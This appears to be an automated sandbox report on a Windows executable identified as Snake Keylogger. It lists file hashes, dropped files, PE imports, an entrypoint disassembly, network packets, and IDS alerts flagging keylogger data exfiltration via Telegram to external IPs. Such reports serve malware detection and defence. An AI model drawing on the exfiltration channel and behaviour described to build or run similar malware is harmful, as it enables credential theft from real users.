                                                                          x8M2g1Xxhz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 104.21.112.1

                                                                          JA3 Fingerprints

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          54328bd36c14bd82ddaa0c04b25ed9adaS39AS7b0P.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                          • 104.21.16.1
                                                                          gGI2gVBI0f.exeGet hashmaliciousMassLogger RATBrowse
                                                                          • 104.21.16.1
                                                                          ZpYFG94D4C.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                          • 104.21.16.1
                                                                          h8izmpp1ZM.exeGet hashmaliciousMassLogger RATBrowse
                                                                          • 104.21.16.1
                                                                          x8M2g1Xxhz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 104.21.16.1
                                                                          JWPRnfqs3n.exeGet hashmaliciousMassLogger RATBrowse
                                                                          • 104.21.16.1
                                                                          c7WJL1gt32.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                          • 104.21.16.1
                                                                          b6AGgIJ87g.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                          • 104.21.16.1
                                                                          ZaRP7yvL1J.exeGet hashmaliciousMassLogger RATBrowse
                                                                          • 104.21.16.1
                                                                          grrezORe7h.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                          • 104.21.16.1
                                                                          3b5074b1b5d032e5620f69f9f700ff0eExodus.txt.lnkGet hashmaliciousStormKittyBrowse
                                                                          • 149.154.167.220
                                                                          dhPWt112uC.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 149.154.167.220
                                                                          h8izmpp1ZM.exeGet hashmaliciousMassLogger RATBrowse
                                                                          • 149.154.167.220
                                                                          x8M2g1Xxhz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 149.154.167.220
                                                                          lrw6UNGsUC.exeGet hashmaliciousXWormBrowse
                                                                          • 149.154.167.220
                                                                          JWPRnfqs3n.exeGet hashmaliciousMassLogger RATBrowse
                                                                          • 149.154.167.220
                                                                          c7WJL1gt32.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                          • 149.154.167.220
                                                                          ZaRP7yvL1J.exeGet hashmaliciousMassLogger RATBrowse
                                                                          • 149.154.167.220
                                                                          grrezORe7h.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                          • 149.154.167.220
                                                                          14lVOjBoI2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                          • 149.154.167.220

                                                                          Dropped Files

                                                                          No context

                                                                          Created / dropped Files

                                                                          C:\Users\user\AppData\Local\Temp\autBBB4.tmp

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\mnXS9meqtB.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):196456
                                                                          Entropy (8bit):7.9684229485300335
                                                                          Encrypted:false
                                                                          SSDEEP:3072:wQAp11Jo1xEkgtNDHDLChYjMEvjI51B37UupA6Rt58dCwhL3zREw3mfQRKgVZNdO:DAp1oTEDHLljRELB3r3/58BJ3uiDdPRk
                                                                          MD5:0CBD5EDA08E436ACF87C9CFEC323DAFF
                                                                          SHA1:ABF4A95FE000130E72D51C92E7D2C8314F072F6F
                                                                          SHA-256:C7373CBC84EC833A748CFA86BBAEE7B1D054807AB27D1032BA4759B828C62694
                                                                          SHA-512:50D04DB63F064C0A37F0011DF9AF3F88D625BB1F8D4FCEB05026CF3ED8428CCC962FCAF55FDDC6573AC3219E1DC76BCBDBC9AEF18DC826EEB2272160A0C556F5
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:EA06..4..D8.z..c7.S....C...z...t..)T0...C3@...T..Sj...g.8.E~.H......7j<..V..dvYl.[-.M.SJ..D..$.t:.....*..i<....3+.t.WZGn......i..{q..i6`.....L, ...w...@..5.W0...S.O..B.L,...FG5.. .....0...18}Zo..Mf..].<.A...%6....Wn.C......o...T......q..+.....C..(fb...UVoY..f.....H...t:U.oY...5P...........I.$.A.Q..j...C..................u....N..i..y[...(1.S.Tp....C....Z[X....0.....I...,..C...f7x.I:....;..........A.P..(...q%....Ep...........>).....!....!.)..o1.m79.%*.....;i.r\. I(..Z..R._......`.8,6?...W.Xx..i..Q,.....N..;xOG....@.1.\.v....<.`#..U.....*.....k.S.\9...G.r4.k.....~1T.-.yJ.m.....i..laT..E.}._.."iN...u.y........w...q.`J../.Df..............i..f ...i.[y,vC7...4j/....AlP.v.m..Q....y..\..(Ws}p.Tt.....U.. \.D~..[.|..3..Vg39....(....kV..h.....E..w..]..+...i@....Y..).>3..vn.....(..s<....5..(.j..;..!.z.2%..Nf.y.:...P.....$..&....... .z........{...L.P.[....7._b.9..N..G#..W.U..f....Y!..|.....s...*}r... .....b({]O"5.......^.C.....DJ?..."5.-;.:.B..-.......D.N....

                                                                          C:\Users\user\AppData\Local\Temp\endochylous

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\mnXS9meqtB.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):209920
                                                                          Entropy (8bit):7.758541529615541
                                                                          Encrypted:false
                                                                          SSDEEP:6144:WpiX6xTCY9RDMw9i8NInVW1tQjJcXgha1:WpiXuT5DxipnVWtQ81
                                                                          MD5:BC54AF7115852A8594843BD69389A7C7
                                                                          SHA1:6A7D52C81EF7FAAF380CAEC43D403B10C0CFB67F
                                                                          SHA-256:63C0C8567474E91133E93701D8BB4B8EDA905A50060A9E96FAAD249763B13BF1
                                                                          SHA-512:D1847B2C1AED047776CA3DDC6EC71B23C80AF94D13339EFD9DD0B188DE36B7FDE239AE37D92C2700C624A32DF3DE6026CA4A5BB7F5FBD1B1A7AA50C0D433E407
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:...7Z9170NEN..CC.JV7Y917tNENJCCCCJV7Y9174NENJCCCCJV7Y9174NEN.CCCMU.9Y.8...D..b.+*9vG+VVEU#e-+--,7j4RyKDY.'+n...c.%2Rw4<=.NENJCCC+Z..uH.I.?.0f2.=qi)IfH.I?..0a2.=o;.I.H.I.m+0V2.=qi?I.H.I.m>0g2.=.#5_uH.I4NENJCCCCJV7Y917.t0.JCCC..V7.857@.E.JCCCCJV7.9.6?OLNJ.BCC.W7Y917..ENJSCCC.W7Y9q74^ENJACCFJV7Y9171NENJCCCC.U7Y=17.uGNHCC.CJF7Y)174NUNJSCCCJV7I9174NENJCCC._T7.9174.GNvQBCCJV7Y9174NENJCCCCJV7Y917..DNVCCCCJV7Y9174NENJCCCCJV7Y917.CGN.CCCCJV7Y9174.DN.BCCCJV7Y9174NENJCCCCJV7Y917.: 6>CCC[.W7Y)174.DNJGCCCJV7Y9174NENjCC#m82V-X17.#ENJ.BCC$V7Y.074NENJCCCCJV7.91w.*$:+CCC.zV7Y.374XENJIACCJV7Y9174NEN.CC.m8%E:917.\DNJ#ACC^W7Y.374NENJCCCCJV7.91w4NENJCCCCJV7Y9174NENJCCCCJV7Y9174NENJCCCCJV7Y9174NENJCCCCJV7Y9174NENJCCCCJV7Y9174NENJCCCCJV7Y9174NENJCCCCJV7Y9174NENJCCCCJV7Y9174NENJCCCCJV7Y9174NENJCCCCJV7Y9174NENJCCCCJV7Y9174NENJCCCCJV7Y9174NENJCCCCJV7Y9174NENJCCCCJV7Y9174NENJCCCCJV7Y9174NENJCCCCJV7Y9174NENJCCCCJV7Y9174NENJCCCCJV7Y9174NENJCCCCJV7Y9174NENJCCCCJV7Y9174NENJCCCCJV7Y9174NENJCCCCJV7Y9174NENJCCCCJV7Y917

                                                                          Static File Info

                                                                          General

                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Entropy (8bit):7.049902904241748
                                                                          TrID:
                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                          File name:mnXS9meqtB.exe
                                                                          File size:1'132'544 bytes
                                                                          MD5:aa367f8d203cd02f8a82a1a351baf271
                                                                          SHA1:60c3c395682962497b9425572b869052d2eb4135
                                                                          SHA256:8bf61f3a1d267156d16c19ef19476210c7aca81406afafd7abbf139a5ccf61a1
                                                                          SHA512:e8ab9600374e55ceb2e216ebd45c33517d0e94eab227b5270c84a13102c65fa801eb12d29ac59ff667f47bf03d718f1d1f19a02ad33a1e007dbfdd2db761aea2
                                                                          SSDEEP:24576:htb20pkaCqT5TBWgNQ7aFIOvBYt/hkIM6A:yVg5tQ7aFvGk5
                                                                          TLSH:AA35CF1373DD8361C7B25273BA657B41BEBF782506A1F86B2FD8093DE820122525E673
                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........

                                                                          File Icon

                                                                          Icon Hash:aaf3e3e3938382a0

                                                                          Static PE Info

                                                                          General

                                                                          Entrypoint:0x425f74
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:false
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                          Time Stamp:0x67490B7F [Fri Nov 29 00:31:59 2024 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:5
                                                                          OS Version Minor:1
                                                                          File Version Major:5
                                                                          File Version Minor:1
                                                                          Subsystem Version Major:5
                                                                          Subsystem Version Minor:1
                                                                          Import Hash:3d95adbf13bbe79dc24dccb401c12091

                                                                          Entrypoint Preview

                                                                          Instruction
                                                                          call 00007F65092E590Fh
                                                                          jmp 00007F65092D8924h
                                                                          int3
                                                                          int3
                                                                          push edi
                                                                          push esi
                                                                          mov esi, dword ptr [esp+10h]
                                                                          mov ecx, dword ptr [esp+14h]
                                                                          mov edi, dword ptr [esp+0Ch]
                                                                          mov eax, ecx
                                                                          mov edx, ecx
                                                                          add eax, esi
                                                                          cmp edi, esi
                                                                          jbe 00007F65092D8AAAh
                                                                          cmp edi, eax
                                                                          jc 00007F65092D8E0Eh
                                                                          bt dword ptr [004C0158h], 01h
                                                                          jnc 00007F65092D8AA9h
                                                                          rep movsb
                                                                          jmp 00007F65092D8DBCh
                                                                          cmp ecx, 00000080h
                                                                          jc 00007F65092D8C74h
                                                                          mov eax, edi
                                                                          xor eax, esi
                                                                          test eax, 0000000Fh
                                                                          jne 00007F65092D8AB0h
                                                                          bt dword ptr [004BA370h], 01h
                                                                          jc 00007F65092D8F80h
                                                                          bt dword ptr [004C0158h], 00000000h
                                                                          jnc 00007F65092D8C4Dh
                                                                          test edi, 00000003h
                                                                          jne 00007F65092D8C5Eh
                                                                          test esi, 00000003h
                                                                          jne 00007F65092D8C3Dh
                                                                          bt edi, 02h
                                                                          jnc 00007F65092D8AAFh
                                                                          mov eax, dword ptr [esi]
                                                                          sub ecx, 04h
                                                                          lea esi, dword ptr [esi+04h]
                                                                          mov dword ptr [edi], eax
                                                                          lea edi, dword ptr [edi+04h]
                                                                          bt edi, 03h
                                                                          jnc 00007F65092D8AB3h
                                                                          movq xmm1, qword ptr [esi]
                                                                          sub ecx, 08h
                                                                          lea esi, dword ptr [esi+08h]
                                                                          movq qword ptr [edi], xmm1
                                                                          lea edi, dword ptr [edi+08h]
                                                                          test esi, 00000007h
                                                                          je 00007F65092D8B05h
                                                                          bt esi, 03h
                                                                          jnc 00007F65092D8B58h
                                                                          movdqa xmm1, dqword ptr [esi+00h]

                                                                          Rich Headers

                                                                          Programming Language:
                                                                          • [ C ] VS2008 SP1 build 30729
                                                                          • [IMP] VS2008 SP1 build 30729
                                                                          • [ASM] VS2012 UPD4 build 61030
                                                                          • [RES] VS2012 UPD4 build 61030
                                                                          • [LNK] VS2012 UPD4 build 61030

                                                                          Data Directories

                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xb70040x17c.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000x4b66c.rsrc
                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x1100000x6c4c.reloc
                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x8d8d00x1c.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb27300x40.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x8d0000x860.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                          Sections

                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                          .text0x10000x8b54f0x8b600f437a6545e938612764dbb0a314376fcFalse0.5699499019058296data6.680413749210956IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                          .rdata0x8d0000x2cc420x2ce00827ffd24759e8e420890ecf164be989eFalse0.330464397632312data5.770192333189168IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          .data0xba0000x9d540x6200e0a519f8e3a35fae0d9c2cfd5a4bacfcFalse0.16402264030612246data2.002691099965349IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                          .rsrc0xc40000x4b66c0x4b800a9470ad6003f48e8a74f62c0fd0fe37dFalse0.912186982615894data7.859510082934406IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          .reloc0x1100000xa4740xa6000bc98f8631ef0bde830a7f83bb06ff08False0.5017884036144579data5.245426654116355IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                          Resources

                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                          RT_ICON0xc45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                          RT_ICON0xc46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                          RT_ICON0xc47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                          RT_ICON0xc49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                          RT_ICON0xc4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                          RT_ICON0xc4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                          RT_ICON0xc5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                          RT_ICON0xc64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                          RT_ICON0xc69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                          RT_ICON0xc8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                          RT_ICON0xca0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                          RT_MENU0xca4a00x50dataEnglishGreat Britain0.9
                                                                          RT_STRING0xca4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                          RT_STRING0xcaa840x68adataEnglishGreat Britain0.2747909199522103
                                                                          RT_STRING0xcb1100x490dataEnglishGreat Britain0.3715753424657534
                                                                          RT_STRING0xcb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                          RT_STRING0xcbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                          RT_STRING0xcc1f80x466dataEnglishGreat Britain0.3605683836589698
                                                                          RT_STRING0xcc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                          RT_RCDATA0xcc7b80x42971data1.0003336351937466
                                                                          RT_GROUP_ICON0x10f12c0x76dataEnglishGreat Britain0.6610169491525424
                                                                          RT_GROUP_ICON0x10f1a40x14dataEnglishGreat Britain1.25
                                                                          RT_GROUP_ICON0x10f1b80x14dataEnglishGreat Britain1.15
                                                                          RT_GROUP_ICON0x10f1cc0x14dataEnglishGreat Britain1.25
                                                                          RT_VERSION0x10f1e00xdcdataEnglishGreat Britain0.6181818181818182
                                                                          RT_MANIFEST0x10f2bc0x3b0ASCII text, with CRLF line terminatorsEnglishGreat Britain0.5116525423728814

                                                                          Imports

                                                                          DLLImport
                                                                          WSOCK32.dll__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
                                                                          VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                          WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                          COMCTL32.dllImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
                                                                          MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                          WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
                                                                          PSAPI.DLLGetProcessMemoryInfo
                                                                          IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                          USERENV.dllUnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
                                                                          UxTheme.dllIsThemeActive
                                                                          KERNEL32.dllHeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
                                                                          USER32.dllSetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
                                                                          GDI32.dllSetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
                                                                          COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                          ADVAPI32.dllGetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
                                                                          SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                          ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                                          OLEAUT32.dllRegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit

                                                                          Possible Origin

                                                                          Language of compilation systemCountry where language is spokenMap
                                                                          EnglishGreat Britain

                                                                          Network Behavior

                                                                          Suricata IDS Alerts

                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                          2025-01-11T09:15:24.902370+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1249711193.122.6.16880TCP
                                                                          2025-01-11T09:15:30.980555+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1249711193.122.6.16880TCP
                                                                          2025-01-11T09:15:31.627549+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.1249713149.154.167.220443TCP
                                                                          2025-01-11T09:15:31.912304+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.1249713149.154.167.220443TCP

                                                                          Network Port Distribution

                                                                          TCP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Jan 11, 2025 09:15:23.952826023 CET4971180192.168.2.12193.122.6.168
                                                                          Jan 11, 2025 09:15:23.957793951 CET8049711193.122.6.168192.168.2.12
                                                                          Jan 11, 2025 09:15:23.957865953 CET4971180192.168.2.12193.122.6.168
                                                                          Jan 11, 2025 09:15:23.958123922 CET4971180192.168.2.12193.122.6.168
                                                                          Jan 11, 2025 09:15:23.962959051 CET8049711193.122.6.168192.168.2.12
                                                                          Jan 11, 2025 09:15:24.665743113 CET8049711193.122.6.168192.168.2.12
                                                                          Jan 11, 2025 09:15:24.669775963 CET4971180192.168.2.12193.122.6.168
                                                                          Jan 11, 2025 09:15:24.674614906 CET8049711193.122.6.168192.168.2.12
                                                                          Jan 11, 2025 09:15:24.857296944 CET8049711193.122.6.168192.168.2.12
                                                                          Jan 11, 2025 09:15:24.902369976 CET4971180192.168.2.12193.122.6.168
                                                                          Jan 11, 2025 09:15:24.934595108 CET49712443192.168.2.12104.21.16.1
                                                                          Jan 11, 2025 09:15:24.934629917 CET44349712104.21.16.1192.168.2.12
                                                                          Jan 11, 2025 09:15:24.934727907 CET49712443192.168.2.12104.21.16.1
                                                                          Jan 11, 2025 09:15:24.962045908 CET49712443192.168.2.12104.21.16.1
                                                                          Jan 11, 2025 09:15:24.962059975 CET44349712104.21.16.1192.168.2.12
